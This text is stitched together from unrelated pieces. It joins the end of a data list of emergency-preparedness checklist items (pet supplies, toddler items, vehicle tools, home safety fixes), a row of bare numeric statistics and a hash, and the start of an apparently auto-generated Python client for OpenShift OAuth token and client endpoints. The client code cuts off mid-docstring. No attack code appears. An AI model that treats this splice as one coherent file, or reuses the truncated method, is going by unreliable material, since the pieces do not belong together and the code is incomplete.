{'checklisttype':'Home','name':'Water (Pets)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'gallon(s)','expiryfactor':'365'},
{'checklisttype':'Home','name':'Medication, medical records and veterinarian\'s details','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Current photo & description of your pets','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'photo/description','expiryfactor':'365'},
{'checklisttype':'Home','name':'Diapers / Pull-ups','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'21','pertype':'individual','quantityunit':'diapers','expiryfactor':'180'},
{'checklisttype':'Home','name':'Baby Wipes (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'pack(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Diaper Rash Ointment (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'tube','expiryfactor':'180'},
{'checklisttype':'Home','name':'Toys (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'180'},
{'checklisttype':'Home','name':'Snacks (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'14','pertype':'individual','quantityunit':'snack','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Clothes (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'7','pertype':'individual','quantityunit':'outfits','expiryfactor':'180'},
{'checklisttype':'Home','name':'Sturdy Shoes (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'pair','expiryfactor':'180'},
{'checklisttype':'Home','name':'Coats (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'coat','expiryfactor':'180'},
{'checklisttype':'Home','name':'Comfort Items (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'item','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Blanket (Toddlers)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Toddlers','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Wood','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':' month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Cash','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'100','pertype':'location','quantityunit':'dollars','expiryfactor':'180'},
{'checklisttype':'Home','name':'Tent','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'item','expiryfactor':'365'},
{'checklisttype':'Home','name':'Tarp','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'item','expiryfactor':'365'},
{'checklisttype':'Home','name':'Warm Clothes (Adults)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'2','pertype':'individual','quantityunit':'outfit','expiryfactor':'365'},
{'checklisttype':'Home','name':'Tools','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'toolbox','expiryfactor':'365'},
{'checklisttype':'Home','name':'Phone Charger (including USB)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'charger','expiryfactor':'365'},
{'checklisttype':'Home','name':'Underwear','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'pack','expiryfactor':'365'},
{'checklisttype':'Home','name':'Batteries','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'variety pack','expiryfactor':'365'},
{'checklisttype':'Vehicle','name':'Jumper Cables','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'set','expiryfactor':'730'},
{'checklisttype':'Vehicle','name':'Seat Belt Cutter','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'730'},
{'checklisttype':'Vehicle','name':'Power Inverter','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'365'},
{'checklisttype':'Vehicle','name':'Window Breaker','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'730'},
{'checklisttype':'Vehicle','name':'Snacks (Vehicle)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'7','pertype':'individual','quantityunit':'snacks','expiryfactor':'180'},
{'checklisttype':'Vehicle','name':'Warm Blanket (Vehicle)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
{'checklisttype':'Vehicle','name':'Coats (Vehicle)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'jacket','expiryfactor':'180'},
{'checklisttype':'Vehicle','name':'Paper Map','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'map','expiryfactor':'365'},
{'checklisttype':'Vehicle','name':'Flares','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'set','expiryfactor':'365'},
{'checklisttype':'Home','name':'Whistle','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'individual','quantityunit':'whistle','expiryfactor':'365'},
{'checklisttype':'Home','name':'Shovel','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'shovel','expiryfactor':'365'},
{'checklisttype':'Home','name':'Bucket','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'bucket','expiryfactor':'365'},
{'checklisttype':'Home','name':'Heavy Duty Trashbags','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'box','expiryfactor':'365'},
{'checklisttype':'Home','name':'Toilet Paper','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'roll','expiryfactor':'365'},
{'checklisttype':'Home','name':'TV is secured','checklistitemdescription':'with velcro, pad, straps, or locks','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Computer is secured','checklistitemdescription':'with velcro, pad, straps, or locks','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Bookcase is secured to the wall','checklistitemdescription':'using nylon strap','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Large cabinet is secured to the wall','checklistitemdescription':'using nylon strap','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'No objects are placed above sofas and beds','checklistitemdescription':'framed pictures, mirrors, etc.','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Exits are clear of obstruction','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Functioning smoke alarms and knowing how and how often to test them','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'Having an in date fire extinguisher','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'},
{'checklisttype':'Home','name':'No overcharged plugs','checklistitemdescription':'no multiplugs plugged into multiplugs','checklistitemurl':'','checklistitemtype':'Fixit','quantityfactor':'1','pertype':'location','quantityunit':'','expiryfactor':'180'}
]
| 144.197452 | 268 | 0.722382 | 1,872 | 22,639 | 8.725962 | 0.159722 | 0.187879 | 0.303581 | 0.094031 | 0.866605 | 0.756535 | 0.734864 | 0.700031 | 0.692746 | 0.476462 | 0 | 0.019674 | 0.027828 | 22,639 | 156 | 269 | 145.121795 | 0.722523 | 0.012766 | 0 | 0 | 0 | 0 | 0.723465 | 0.097727 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006897 | 0 | 0.006897 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
886d94e9c4ad3e18755b1c2d3faa587291f3e41e | 173,551 | py | Python | openshift/client/apis/oauth_openshift_io_v1_api.py | flaper87/openshift-restclient-python | 13d5d86ca89035b9f596032e7a34f3cc33bf8f18 | [
"Apache-2.0"
] | null | null | null | openshift/client/apis/oauth_openshift_io_v1_api.py | flaper87/openshift-restclient-python | 13d5d86ca89035b9f596032e7a34f3cc33bf8f18 | [
"Apache-2.0"
] | null | null | null | openshift/client/apis/oauth_openshift_io_v1_api.py | flaper87/openshift-restclient-python | 13d5d86ca89035b9f596032e7a34f3cc33bf8f18 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a client. By listing and beginning a watch from the returned resourceVersion, clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'unversioned.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
OpenAPI spec version: v3.6.0-alpha.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from kubernetes.client.configuration import Configuration
from ..api_client import ApiClient
class OauthOpenshiftIoV1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_oauth_openshift_io_v1_o_auth_access_token(self, body, **kwargs):
"""
create an OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_access_token(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAccessToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, body, **kwargs):
"""
create an OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_access_token_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAccessToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAccessToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_access_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAccessToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_oauth_openshift_io_v1_o_auth_authorize_token(self, body, **kwargs):
"""
create an OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_authorize_token(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAuthorizeToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, body, **kwargs):
"""
create an OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthAuthorizeToken body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthAuthorizeToken
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_authorize_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAuthorizeToken',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_oauth_openshift_io_v1_o_auth_client(self, body, **kwargs):
"""
create an OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClient body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_oauth_openshift_io_v1_o_auth_client_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_client_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_client_with_http_info(self, body, **kwargs):
"""
create an OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClient body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_client`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClient',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_oauth_openshift_io_v1_o_auth_client_authorization(self, body, **kwargs):
"""
create an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client_authorization(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClientAuthorization body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, body, **kwargs):
"""
create an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClientAuthorization body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_client_authorization`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientAuthorization',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_collection_o_auth_access_token(self, **kwargs):
"""
delete collection of OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_access_token(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(**kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(**kwargs)
return data
def delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(self, **kwargs):
"""
delete collection of OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_collection_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_collection_o_auth_authorize_token(self, **kwargs):
"""
delete collection of OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(**kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(**kwargs)
return data
def delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(self, **kwargs):
"""
delete collection of OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(callback=callback_function)
